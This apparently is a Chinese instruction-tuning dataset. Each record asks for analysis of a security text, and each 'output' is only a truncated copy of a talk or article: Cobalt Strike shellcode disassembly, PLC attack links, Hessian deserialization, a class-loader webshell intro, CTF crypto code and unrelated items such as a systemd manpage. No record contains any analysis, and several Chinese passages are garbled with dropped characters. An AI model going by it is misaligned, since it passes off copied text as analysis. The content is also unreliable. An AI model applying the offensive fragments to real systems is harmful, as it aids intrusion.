{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCS的shellcode功能分析和代码重写实战 前 随着圈的新越来越多我准备从这篇开始慢慢写些与基础知识相关的章便 些对进制安全知识了解不多的同学参考虽然讲的还是基础知识但是我也尽量写的实 和有趣点防与上的章出现同质化问题 这篇要讲的问题是由上篇章 滥具备RWX-S权限且有签名的dll进感知的shellcode 注引出的有同学问我为什么接收 metepreter 第阶段的恶意代码需要那样写本篇 章就回答这个问题 另外常欢迎各位同学在圈提问能为基础知识板块的编写提供更多素材 CS的shellcode功能分析 我们这讲的其实是stage类型的shellcode为了便调试从cs中获取出这段代码我们 需要把它编译成exe由于我是 *nix 系统这就 nasm 进编译 x86_64-w64-min gw32-ld 进链接成exe 编写 start.asm 如下 然后编译连接 测试下可以上线接下来ida打开分析下执逻辑 开头就是个 call 跟进去简单看下代码逻辑 nasm -f win64 start.asm -o prog1.o x86_64-w64-mingw32-ld prog1.o -o prog1.exe 1 2 看到pop了 rbp 然后 call rbp 显然这个函数的作是把 call 的下条指令作为函数 进调我们定义下这个函数然后仔细阅读下我对所有的代码都打了注释这个 函数包含了核代码 .text:000000014000100A call_function_with_hash proc near .text:000000014000100A .text:000000014000100A var_38 = qword ptr -38h .text:000000014000100A .text:000000014000100A push r9 .text:000000014000100C push r8 .text:000000014000100E push rdx .text:000000014000100F push rcx .text:0000000140001010 push rsi .text:0000000140001011 xor rdx, rdx .text:0000000140001014 mov rdx, gs: [rdx+60h] ; 获取 PEB .text:0000000140001019 mov rdx, [rdx+18h] ; 获取 Ldr .text:000000014000101D mov rdx, [rdx+20h] ; 获取 InMemoryOrderModuleList .text:0000000140001021 .text:0000000140001021 loc_140001021: ; CODE XREF: call_function_with_hash+C3j 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 .text:0000000140001021 mov rsi, [rdx+50h] ; 获取第个dll的BaseDllName .text:0000000140001025 movzx rcx, word ptr [rdx+4Ah] ; 获取 BaseDllName unicode_string 的 max_length .text:000000014000102A xor r9, r9 .text:000000014000102D .text:000000014000102D loc_14000102D: ; CODE XREF: call_function_with_hash+34j .text:000000014000102D xor rax, rax .text:0000000140001030 lodsb .text:0000000140001031 cmp al, 61h ; 'a' .text:0000000140001033 jl short loc_140001037 .text:0000000140001035 sub al, 20h ; ' ' .text:0000000140001037 .text:0000000140001037 loc_140001037: ; CODE XREF: call_function_with_hash+29j .text:0000000140001037 ror r9d, 0Dh .text:000000014000103B add r9d, eax .text:000000014000103E loop loc_14000102D ; 计算 hash .text:000000014000", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIP Law Copyright DMCA Trademark Patent Trade Secret Copyright - Definition Copyright protects \"original works of authorship, fixed in a tangible medium of expression\". In the following categories: literary, musical, dramatic, choreographic, pictorial, sculptural, audiovisual, sound, architectural. Not in these categories: ideas, procedures, processes, systems, methods of operation, concepts, principles, or discoveries. Copyright - Bundle of Rights Reproduce Distribute Publicly Perform / Display Create derivative works Transfer / Sell work or rights License rights Owner may sue for the infringement of the above rights Copyright - Duration Author's life plus 70 years. Or if made by a corporation, 95 years after publication or 120 years after creation. Originally in 1790: 14 years + 14 more years if author still alive Copyright - Why is this a good idea? We want to reward authors for being creative. Not all authors are motivated purely by a desire to create art. Copyright - Fair Use Fair use factors: 1) Purpose and Character of the use (commercial vs. educational non-profit) 2) Nature of the copyrighted work 3) Amount of work copied in relation to entire work 4) Effect of use on potential market or value of copyrighted work Copyright - Example 1 Alan writes a novel and titles it \"Code Monkey\". It becomes a bestseller almost overnight. Bob decides to copy and sell the content of the novel under the title \"Source Simian\". Can Alan win a copyright suit against Bob? Copyright - Example 2 Gene is an artist, hired to plan and create a unique garden for the City. Gene creates precisely designed beds of flowers and bushes in ways that have never been seen before. After six months, the plants have grown and the City wants to trim them down. Gene sues, saying he owns the copyright to his work of art, and the City cannot alter it without his permission. What result and why? DMCA Digital Millenium Copyright Act Passed in 1998 in order to \"modernize\" some aspects of copyright law. ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHomeless Vikings Cut it out. Youre just making it worse. A marginally entertaining talk by Dave Josephsen Who IS this guy?  Dave. Sysadmin.  Various (mostly useless) Certifications  I wrote a book. You should buy it (I could use the $4)  I write the monitoring column for ;login magazine.  Use SourceMage! You might find me at  usenix LISA  usenix security  usenix tech  NANOG  defcon It all went down sorta like this: Conclusions I think we can draw from this  There is no such thing as repudiating mail from  Spammers will find a way to use your credentials  Delivery countermeasures are broken, and have generally made things worse.  Content filtering is NOT dead (contrary to popular belief). Whats all this about BGP? In short, Prefix Hijacks make the IPs of others, your own. This isn't new They've been used in the past to social engineer blocks of net-space away from unsuspecting RIR's, for the purpose of selling them to private enterprise who didn't know any better. In the past few years, a new kind of prefix hijack has become more prevalent. These are hard to detect and trace because they last for around 15 minutes, and come with a lot of AS prepending Why would you do this?  NMap the NSA  P2P MP3's  DOS the RIAA  Other Illegal acronyms How does it work? Usually, like this: If someone doesnt play nice: Or is clever and not nice: But spammers dont care about your netblock anyway. But there isnt much unallocated IPV4 space right?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom sage.all import GF, PolynomialRing P=PolynomialRing(GF(2),'x') e = 31337 n = P('x2048 + x2046 + x2043 + x2040 + x2036 + x2035 + x2034 + x2033 + x2031 + x2029 + x2025 + x2024 + x2022 + x2019 + x2018 + x2017 + x2012 + x2007 + x2006 + x2004 + x2000 + x1999 + x1998 + x1997 + x1993 + x1992 + x1991 + x1986 + x1982 + x1981 + x1979 + x1978 + x1977 + x1975 + x1970 + x1964 + x1963 + x1962 + x1961 + x1960 + x1959 + x1958 + x1955 + x1954 + x1952 + x1951 + x1949 + x1947 + x1942 + x1939 + x1938 + x1936 + x1934 + x1933 + x1932 + x1930 + x1928 + x1927 + x1923 + x1922 + x1919 + x1918 + x1915 + x1914 + x1913 + x1912 + x1911 + x1910 + x1908 + x1903 + x1902 + x1900 + x1899 + x1897 + x1893 + x1891 + x1890 + x1886 + x1881 + x1880 + x1879 + x1878 + x1875 + x1874 + x1873 + x1872 + x1871 + x1870 + x1869 + x1865 + x1863 + x1862 + x1860 + x1856 + x1855 + x1853 + x1852 + x1845 + x1841 + x1839 + x1837 + x1836 + x1835 + x1833 + x1832 + x1829 + x1828 + x1827 + x1826 + x1824 + x1823 + x1822 + x1821 + x1820 + x1819 + x1818 + x1817 + x1813 + x1812 + x1810 + x1809 + x1808 + x1807 + x1803 + x1799 + x1797 + x1796 + x1794 + x1792 + x1790 + x1786 + x1783 + x1782 + x1779 + x1778 + x1776 + x1775 + x1774 + x1772 + x1767 + x1766 + x1765 + x1764 + x1763 + x1762 + x1759 + x1757 + x1756 + x1754 + x1753 + x1752 + x1750 + x1749 + x1741 + x1734 + x1730 + x1729 + x1726 + x1725 + x1723 + x1722 + x1721 + x1716 + x1714 + x1713 + x1712 + x1710 + x1709 + x1706 + x1705 + x1703 + x1702 + x1700 + x1698 + x1693 + x1692 + x1691 + x1690 + x1683 + x1682 + x1681 + x1680 + x1679 + x1677 + x1672 + x1670 + x1669 + x1666 + x1663 + x1662 + x1661 + x1659 + x1655 + x1653 + x1651 + x1649 + x1648 + x1647 + x1646 + x1644 + x1643 + x1642 + x1640 + x1639 + x1638 + x1634 + x1633 + x1628 + x1620 + x1619 + x1618 + x1616 + x1614 + x1611 + x1610 + x1608 + x1605 + x1604 + x1603 + x1599 + x1597 + x1595 + x1594 + x1590 + x1588 + x1587 + x1585 + x1583 + x1580 + x1579 + x1577 + x1574 + x1573 + x1572 + x1568 + x1566 + x1565 + x1563 + x1562 + x15", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Bitcoin Hardware Wallets Glitches cause stitches! Josh Datko Chris Quartier Kirill Belyayev Updated: 2017/07/07 Link Drop! All updated references, notes, links, can be found here: https://www.cryptotronix.com/breakingbitcoin The bug that started it all 1 bool storage_is_pin_correct(const char *pin) 2 { 3 return strcmp(shadow_config.storage.pin , 4 pin) == 0; 5 } On the STM32F205, when the first pin character is wrong it returns in 100ns. When the fourth was wrong, it returned in about 1100ns. If this was there, what else could we find? Broken Window Theory for Bugs Initial Attack Plan 1. Send change_pin via Python. 2. Watch the return over USBmeasure when the PIN failed. 3. Profit?! Prevents retries with a busy wait loop. Back off timer ChipWhisperer 1 This talk Fault Attacks Bitcoin Hardware Wallets ChipWhisperer One slide intro to Fault Attacks Definition An attack that applies an external stress on electronic system, which generates a security failure2. Two Parts: 1. Fault Injection  Vcc glitching  Clock glitching 2. Fault Exploitation  Nicolas Bacca suggested glitching flash ops3, we wanted to bypass the PIN as it was closer to ChipWhisperer examples. Our Motivation What happens when you apply the ChipWhisperer to the STM32F205 (F205)? # Is the F205 vulnerable to fault injection? # Is the TREZOR firmware exploitable via a fault? # How do we raise awareness for these kinds of attacks? We just press the glitch button right? # Turns out, you cant just shake the wallet and have BTC fall out. # Requires some RE to determine voltages, test points, how to modify the firmware, etc... # HW Wallets went OOS :( Exhaust the supply chain How to slow down attacks The Fail Train Cometh # Clock glitching kinda worked? It made Windows USB very sad :( # Rebooting unsigned firmware is teh suck (buttons to press). # Timing analysis was working, but power analysis with CW was not. # Logic level conversion is proof that the singularity is far away. # Lots of scotch. Or why d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNetwork Anti-Reconnaissance Messing with Nmap Through Smoke and Mirrors - AltF4 Anti-Reconnaissance  Consider 3 main phases of a network attack: 1) Gain Access 2) Perform Reconnaissance 3) Exploit Vulnerability  Focusing on the second phase  Anti-Reconnaissance  Obscures the network  Obfuscate  Not Intrusion Detection / Prevention  Not Access Control Reconnaissance: HowTo  Find information to use in an exploit  Number of systems  ARP Sweep scan / ICMP Echo  Types (OS) of systems  OS detection scans  Open ports  TCP SYN / CONN (etc...) scans  Network Topology  Traceroute  Running Services  Service Detection Scans Why Is Detecting Recon Hard?  Signatures Fail  Identical at the packet level  ARP, TCP SYNs, ICMP, ...  Speed  Being very slow can be stealthy One packet per hour  Being very fast can be stealthy Finish before anyone notices  Already inside your network  Border security already bypased (firewall) Why Is Preventing Recon Hard?  Metadata  Can't encrypt it  Obfuscation Constraining The Problem  A Needle in a Haystack  Drown real nodes with realistic fake ones  Honeyd  Two goals:  Obfuscates the network  Reconnaissance gets lots of bogus results  Identifies Reconnaissance  Traffic to decoys are presumptively hostile Honeypots and Decoys  Low Fidelity Honeypots  Not a real machine  Nor a Virtual Machine as you know it  Can't be exploited like a VM can  Can be produced en masse  Honeyd  Last update: 05/07/2007  Nmap new probes since then nmap-os-db  github.com/datasoft/honeyd Haystack  Attacker gains access  Massive network  Most machines are fake  Can't tell the difference  Reconnaissance becomes:  Ineffective  Cumbersome  Obvious Classification  High Fidelity Honeypots  Inspect log files Manually Maybe automated tools  Signatures IDS / Antivirus Mostly fails Machine Learning  K - Nearest Neighbors  N Statistical Features  Scalar Values  Packet Timing  IPs contacted  Ports contacted  Haystack nodes contacted  Training Data  Programmed into the system  Like a spam", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"SYSTEMD\\-QUOTACHECK\\&.SERVICE\" \"8\" \"\" \"systemd 231\" \"systemd-quotacheck.service\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" systemd-quotacheck.service, systemd-quotacheck \\- 文件系统配额检查 .SH \"SYNOPSIS\" .PP systemd\\-quotacheck\\&.service .PP /usr/lib/systemd/systemd\\-quotacheck .SH \"描述\" .PP systemd\\-quotacheck\\&.service 服务 可用于检查文件系统配额在系统启动过程中当挂载完所有必要的文件系统之后 仅在确实存在至少一个开启了配额限制的文件系统的情况下 该服务将运行一次 .SH \"内核引导选项\" .PP systemd\\-quotacheck 能够识别 下列内核引导选项 .PP \\fIquotacheck\\&.mode=\\fR .RS 4 表示操作模式有效值为 \"auto\", \"force\", \"skip\" 之一 默认值 \"auto\" 表示 仅在确实存在开启了配额限制的文件系统的情况下 才进行文件系统配额检查 \"force\" 表示无条件的对所有文件系统强制进行 配额检查\"skip\" 表示无条件的强制跳过所有文件系统的配额检查 .RE .SH \"参见\" .PP \\fBsystemd\\fR(1), \\fBquotacheck\\fR(8), \\fBsystemd-fsck@.service\\fR(8) .\\\" manpages-zh translator: 金步国 .\\\" manpages-zh comment: 金步国作品集http://www.jinbuguo.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PLC攻击 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **PLC的概念** PLC 控制系统(Programmable Logic Controller可编程逻辑控制器)专为工业生产设计的一种数字运算操作的电子装置它采用一类可编程的存储器用于其内部存储程序执行逻辑运算顺序控制定时计数与算术操作等面向用户的指令并通过数字或模拟式输入/输出控制各种类型的机械或生产过程是工业控制的核心部分简要的说PLC 就是一部小型的工业电脑 PLC 的关键技术在于其内部固化了一个能解释梯形图语言的程序及辅助通讯程序实际上设计一台 PLC 的主要工作就是开发解释梯形图语言的程序 **PLC的使用介绍** - [西门子S7-300教程 第1章](https://wenku.baidu.com/view/eb015e01b52acfc789ebc9cd) - [西门子S7-300教程 第2章](https://wenku.baidu.com/view/86d25c104431b90d6c85c7cf.html) - [西门子S7-300教程 第3章](https://wenku.baidu.com/view/9e1e454f852458fb770b56c9) **相关文章** - [从0~1学习PLC攻击](https://www.freebuf.com/column/238349.html) - 复现 DCCE MAC1100 PLC 任意程序覆盖漏洞 - [工控安全-初识西门子PLC~S7-200](https://www.freebuf.com/column/202499.html) - [PLC编程与应用入门一](https://www.freebuf.com/column/206084.html) - [工控安全 | 西门子S7-300攻击分析](https://www.freebuf.com/articles/ics-articles/228770.html) - [工控安全S7-1200 PLC远程启停攻击实验](https://www.key1.top/index.php/archives/469/) - [西门子S7通信过程及重放攻击分析](https://www.freebuf.com/articles/ics-articles/212283.html) - [工控安全大工PLC-远程启停攻击实验](https://mp.weixin.qq.com/s/k9tSpQaaeJ7QKSa9cb_bWg) - [当PLC偶遇老旧但不乏经典的高级组包工具Hping3](https://www.freebuf.com/vuls/230453.html) - [PLC攻击类型研究分析](https://www.freebuf.com/articles/ics-articles/238351.html) - [博智工控漏洞挖掘平台实战-西门子PLC漏洞挖掘](https://mp.weixin.qq.com/s/DTxqFzwlTN9OQgHGfp705g) **漏洞利用框架** - [dark-lbp/isf](https://github.com/dark-lbp/isf) - 基于 Python 开发的工控方面漏洞利用框架,类似 MetaSploit **设备解密** - [管中窥豹之工控设备解密](https://www.freebuf.com/articles/ics-articles/240727.html) --- ## 仿真搭建 ### Siemens **相关文章** - [西门子PLC的网络仿真搭建方法探讨](https://www.freebuf.com/articles/ics-articles/236250.html) **仿真工具** 目前西门子 PLC 主要使用的软件包括 STEP7-Micro/WIN SMARTSIMATIC STEP7 以及 TIA PortalTIA Portal 已经完全兼容 STEP 7因此以后应该是 STEP 7-MicroWIN SMART 作为小型 PLC 的编程软件 - [Snap7 Homepage](http://snap7.sourceforge.net/) - 一款开源的 32/64 位多平台以太网通信套件用于与西门子 S7 PLC 进行本地连接 **实验记录** - [siemens仿真搭建实验](./实验/siemens仿真搭建实验.md) - [S7-300启停实验](./实验/S7-300启停实验.md) --- ### OpenPLC **介绍** OpenPLC ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nComparison between two practical mix designs Claudia Dıaz Len Sassaman Evelyne Dewitte Abstract We evaluate the anonymity provided by two popular email mix im- plementations, Mixmaster and Reliable, and compare their effectiveness through the use of simulations which model the algorithms used by these mixing applications. In order to draw accurate conclusions about the op- eration of these mixes, we use as our input to these simulations actual traffic data obtained from a public anonymous remailer (mix node). We determine that assumptions made in previous literature about the distri- bution of mix input traffic are incorrect, and our analysis of the input traffic shows that it follows no known distribution. We establish for the first time that a lower bound exists on the anonymity of Mixmaster, and discover that under certain circumstances the algorithm used by Reliable provides no anonymity. We find that the upper bound on anonymity pro- vided by Mixmaster is slightly higher than that provided by Reliable. We identify flaws in the software code in Reliable that further compromise its ability to provide anonymity, and review key areas which are necessary for the security of a mix in addition to a sound algorithm. Our analysis can be used to evaluate under which circumstances the two mixing al- gorithms should be utilized to best achieve anonymity and satisfy their purpose. Our work can also be used as a framework for establishing a security review process for mix node deployments. 1 Introduction The Internet was initially perceived as a rather anonymous environment. Nowa- days, we know that it can be a powerful surveillance tool: anyone willing to listen to the communication links can spy on Internet users, and search engines and data mining techniques are becoming increasingly powerful. Privacy does not only mean confidentiality of the information; it also means not revealing information about who is communicating with whom. Anonymous remailers (also called mixes) allow their", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Python 3 from Crypto.Util.number import * from hashlib import sha1 bits = 1024 def LCM(x, y): return x * y // GCD(x, y) def L(x, n): return (x - 1) // n p = getStrongPrime(bits/2) q = getStrongPrime(bits/2) n = p*q n2 = n*n k = getRandomRange(0, n) g = (1 + k*n) % n2 sk1 = LCM(p - 1, q - 1) sk2 = inverse(L(pow(g, sk1, n2), n), n) message = getRandomInteger(bits - 1) with open(\"message\", \"w\") as f: f.write(hex(message)) with open(\"flag\", \"w\") as f: f.write(\"TWCTF{\" + sha1(str(message).encode(\"ascii\")).hexdigest() + \"}\\n\") with open(\"secretkey\", \"w\") as f: f.write(hex(sk1) + \"\\n\") f.write(hex(sk2) + \"\\n\") with open(\"publickey\", \"w\") as f: f.write(hex(n) + \"\\n\") f.write(hex(n2) + \"\\n\") f.write(hex(g) + \"\\n\") def encrypt(m): r = getRandomRange(1, n2) c = pow(g, m, n2) * pow(r, n, n2) % n2 return c ciphertext = encrypt(message) with open(\"ciphertext\", \"w\") as f: f.write(hex(ciphertext) + \"\\n\")", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nw waarrddrriivviinngg tthhee ssm maarrtt ggrriidd :::: pprraaccttiiccaall aapppprrooaacchheess ttoo aattttaacckkiinngg uuttiilliittyy ppaacckkeett rraaddiiooss :::: sshhaawwnn m mooyyeerr aanndd nnaatthhaann kkeellttnneerr D DeeffC Coonn 0000001100001100 DEF CON 00010010 Moyer / Keltner :: Wardriving the Smart Grid Page 2 This page intentionally left blank. DEF CON 00010010 Moyer / Keltner :: Wardriving the Smart Grid Page 3 This page intentionally left blank, too. DEF CON 00010010 Moyer / Keltner :: Wardriving the Smart Grid Page 4 This page wasn't supposed to be blank. Not sure what happened there. Plz advise. DEF CON 00010010 Moyer / Keltner :: Wardriving the Smart Grid Page 5 \"The truth is also that a well-placed squirrel can wreak almost as much havoc as a cyber attack on a power grid.\" Doctor Charles Palmer, Director, Institute for Advanced Security, IBM, June 2010 We must find this well-placed squirrel, and ensure that it never falls into the hands of our enemies. Shawn Moyer, esq, The Internet, June 2010 DEF CON 00010010 Moyer / Keltner :: Wardriving the Smart Grid Page 6 If you haven't just emerged from a coma, you probably have some idea of the multifaceted attack surface that the inevitable modernization of power transmission and distribution is rapidly introducing. What you may not be thinking about just yet, though, is the path much of that attack surface travels on... The air around you. So where do we start? The \"Smart Grid\" itself is pretty well understood at this point, and I won't bore you by linking to some Wikipedia article or other and describing it. At the end of the day it's pretty simple: Utilities have been operating more or less in the dark, or at least at a macro-level, for a long time now, with no real idea of load or usage beyond (at best) a neighborhood or substantion level. The price paid for that lack of visibility is clear as well: brownouts and blackouts caused by unexpected or unforeseen changes in load that, while rare, often have", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow To Get Your FBI File (and Other Information You Want From the Federal Government) DEF CON 18 July 30, 2010 Whats the FOIA? The Freedom of Information Act is a law that lets anyone ask for records from federal agencies. An agency has to give you the stuff you ask for unless it thinks that theres a good reason not to give it to you. What are good reasons not to give it to you? Classified Law enforcement Proprietary information/trade secrets Privileged Privacy Other laws say it doesnt have to be disclosed Internal personnel rules and practices How do you know what to ask for? Be observant. news reports press releases government reports congressional hearings etc., etc. etc. How do you know where to send your request? Figure out which agency is most likely to have the stuff youre looking for. There may be more than one. Check the agencys website for contact information. How do you write your request? Describe what you want as precisely as possible. Write for a lay reader. Provide supporting news articles, etc., if there are any. Consider asking for expedited processing. How do you write your request? If appropriate, ask for reduced fees. Note: You may not have to pay search or review fees if you can show that youre a member of the media or an educational or scientific institution, and youre not requesting stuff for commercial use. What if Im asking about myself? FOIA works. Privacy Act does, too, if youre a U.S. citizen or permanent legal resident. Youll need to provide some personal information such as name, aliases, address, phone number, date of birth, place of birth, and SSN (optional). What if Im asking about myself? Youll need to certify under penalty of perjury that youre not providing false information. Check the agency website for FOIA/PA request forms or ways to submit online, which might make the whole thing easier. And then you wait. Theyre supposed to get back to you within 20 working days, but they probably wont. So then what? You can badger them. You ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-hessian反序列化 介绍 自己不会查吗? 这里有一个点就是Hessian的序列化与反序列化与原生序列化与反序列化不同就以使用的Resin链而言其中的ja vax.naming.spi.ContinuationDirContext类并没有实现java.io.Serializable接口但是hessian还是可以 正常对他进行序列化用原生的序列化方式就会失败区别就在于序列化对象时的一个设置可以让未继承java.i o.Serializable接口的类进行序列化 使用 hessian的使用有很多场景也结合了 servlet和 spring这里的使用先使用自行封装然后调试分析漏洞成因 最后再看整合后的集中情况 <dependencies> <dependency> <groupId>com.caucho</groupId> <artifactId>hessian</artifactId> <version>4.0.38</version> </dependency> <dependency> <groupId>com.caucho</groupId> <artifactId>resin</artifactId> <version>4.0.63</version> <scope>provided</scope> </dependency> <!-- https://mvnrepository.com/artifact/com.caucho/quercus --> <dependency> <groupId>com.caucho</groupId> <artifactId>quercus</artifactId> <version>4.0.66</version> </dependency> </dependencies> 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 package ; import HessianInput; import HessianOutput; import Dao.User; import *; import ArrayList; import Logger; public class HessionUtils { private static byte[] serialize(Object object){ try { ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); HessianOutput hessianOutput = new HessianOutput(byteArrayOutputStream); hessianOutput.writeObject(object); return byteArrayOutputStream.toByteArray(); }catch (Exception e) { e.printStackTrace(); return null; } } private static Object deserialize(byte[] bytes){ try { ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes); HessianInput hessianInput = new HessianInput(byteArrayInputStream); Object o = hessianInput.readObject(); return o; }catch (Exception e){ e.printStackTrace(); } return null; } public static void main(String[] args) { User zhangsan = new User(\"zhangsan\", 20, true); byte[] serialize = serialize(zhangsan); System.out.println(new String(serialize)); User deserialize =(User) deserialize(serialize); String s = deserialize.toString(); System.out.println(s); System.out.println(\"*******************int类型*****************\"); int age = 100; byte[] ageSrial = serialize(ag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Unauthenticated Journey to Root : Pwning Your Companys Enterprise Software Servers Yvan Genuer Onapsis ygenuer@onapsis.com Pablo Artuso Onapsis partuso@onapsis.com 1. Abstract Companies consist of a plethora of software, hardware, vendors, and solutions working to- gether to keep the business running and alive. When it comes to Enterprise Software, because of its intrinsic criticality and complexity, com- panies rely on expert vendors in the field. SAP, one of the largest Enterprise Software vendors, is definitively part of this list. With huge pres- ence around the globe, SAP systems could be found in almost every mid-to-large company providing one of the most critical actions: Ad- ministrating the companys business. This paper will illustrate an in-depth anal- ysis performed against one of the most im- portant assets of every company: its SAP im- plementation. All phases of the research will be depicted, starting from the introduction of each analysed component, continuing with the techniques that helped us find the vulnerabil- ities, up to discussing all security measures that could be followed in order to be protected against them. Furthermore, post exploitation scenarios will be discussed which will help to better illustrate the impact that the found flaws could have, not only in technical but also in business terms. 2. Keywords SAP, Enterprise Software, RCE, root, Solution Manager, SolMan, Host Agent, CVE-2020-6207, CVE-2020-6234, CVE-2020-6236 3. Acknowledgements To our leader, Nahuel D. Sánchez, who helped us throughout the research, providing support, sharing discussions and pushing us in order to get the best out of ourselves. 4. Introduction Enterprise software is one of the most impor- tant topics when discussing about companys assets. They usually manage sensitive and crit- ical information. It is because of this reason that companies opt for experts in the field to trust one of their most critical assets. SAP is one of the largest vendors of Enterprise S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJava类加载机制 本发表于赛博回忆录 正如我们学习Java安全样家都知道RCE是第产那么就要从Java的类加载机制和反射机制 这两类基础开始学习下我们来由浅深的了解下Java的类加载机制 Java是个靠JVM实现编译运从跨平台的个开发语 然后在虚拟机中默认了提供了了三种类加载器启动类加载器Bootstrap ClassLoader扩展类加载 器Extension ClassLoader应类加载器Application ClassLoader 双亲委派模型 三种不同的加载器那么存在个谁加载加载顺序是什么的问题其概的加载顺序可以通过学习 双亲委派模型来了解 Java程序运流程概如下 java代码编译class件 .class件读内存 创建对象 1启动类加载器 负责加载在\\lib录和被-Xbootclasspath参数所指定的路径中的类库 2扩展类加载器 负责加载 \\lib\\ext录 和 被java.ext.dirs系统变量所指定的路径中的所有类库 3应类加载器 负责加载户类路径classPath所指定的类库如果应程序中没有定义过的类加载器般情况 下这个就是程序中默认的类加载器 从图中可以看出除类顶层的启动类加载器以外其他加载器都有类加载器在加载个类的时候 会先从底判断是否加载了这个类然后从顶层往下加载只有类加载器加载不类的时候才会向下加 载 当然我们知道般我们写的程序在我们不指定加载器的情况下默认情况下会使  AppClassLoader 加载类可以通过 ClassLoader.getSystemClassLoader() 来返回系统类加载器来判断 其中有些个例如 java.io.file 类返回的就是 null 的原因就是因为已经被类 Bootstrap ClassLoader 加载 定义加载类 在知道Java的类加载的这种机制下我们可以配合后续要讲的Java的反射来进来进如定义加载类 这个操作 在这如我们如果只讲类加载的应等话我们可以通过编写的类的对象来调本地命令因 为现在有很多通过RASP检测绕过很多基于流量的保护 第步 先定义个 TestWebshell 类 然后我们要采定义的类加载器来加载TestWebshll类 public class TestWebshell { public String hello() { System.out.println(\"Hello World!\"); } } 通过上的代码我们定义了个 MyClassLoader ,我们定义了要加载的类的 ClassName 和 其 classpath 这样就可以类 ClassLoader 中的 findClass 传字节码和 defineClass 注 册加载类这个法 public class MyClassLoader extends ClassLoader { private static String testClassName = \"类名\"; private static String classPath = \"路径\"; //findLoadedClass法检查是否初始化 //然后传字节码调defineClass法去JVM中注册该类 @Override protected Class<?> findClass(String className ) { byte[] testClassBytes = this.loadClassData(className ); return this.defineClass(testClassName, testClassBytes, 0, testClassBytes.length); } //对要加载的包获取其字节码 private static byte[] loadClassData(String className ) { try { // 传进来是带包名的 className = className.replace(\".\", \"//\"); FileInputStream inputStream = new FileInputStream(new File(classPath + className + \".class\")); // 定义字节数组输出流 ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); int b = 0; while ((b = inputStream.read()) != -1) { byteArrayOutputStream.write(b); } inputStream.close(); return byteArrayOutputStream.toByteArray(); }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom Raxacoricofallapatorius With Love Case Studies in Insider Threat AGENDA  Introduction & Curriculum Vitae  History & Current Events  Definitions  Case Studies  Current Research  Sources FAMOUS (Infamous?) INSIDER THREATS Cost to pay Insider Dr. Ten Hong Lee to turn over highly sensitive and valuable proprietary manufacturing information and research data: $150-160k Ability to leap frog years of experimentation and bring a product similar to Averys to market immediately: PRICELESS! I give it out to six people, and if I cant trust them to that degree, then I have no desire to make it. Industrial Espionage VS Economic Espionage INDUSTRIAL ESPIONAGE The theft of trade secrets by the removal, copying or recording of confidential or valuable information in a company for use by a competitor. ECONOMIC ESPIONAGE The targeting or acquisition of trade secrets to knowingly benefit any foreign government, foreign instrumentality, or foreign agent. (Title18 U.S.C., Section 1831) SPY A pre-existing trust or relationship is not required (but can exist). TRAITOR An established confidence that is betrayed. INSIDER THREAT Can be willful or a result of ignorance/neglect. Is not always malicious in nature. Formal Definition MALICIOUS Insider 1. Current or former employee, contractor, or business partner 2. Has or had authorized access 3. Intentionally exceeded or misused that access 4. Negatively affected the organization Espionage recruitment involving sexual seduction. honeypot (ˈhəәnēˌpät) SHARON MARIE SCRANAGE Female CIA Employee compromised by male honey pot When? 1980s (1983 -1985) Where? Accra, Ghana  Romance that evolved into threats of violence  Information was stolen from files and cables  Copied short hand and translated into long hand RED FLAGS  Lover was cousin of Ghana President  Lied 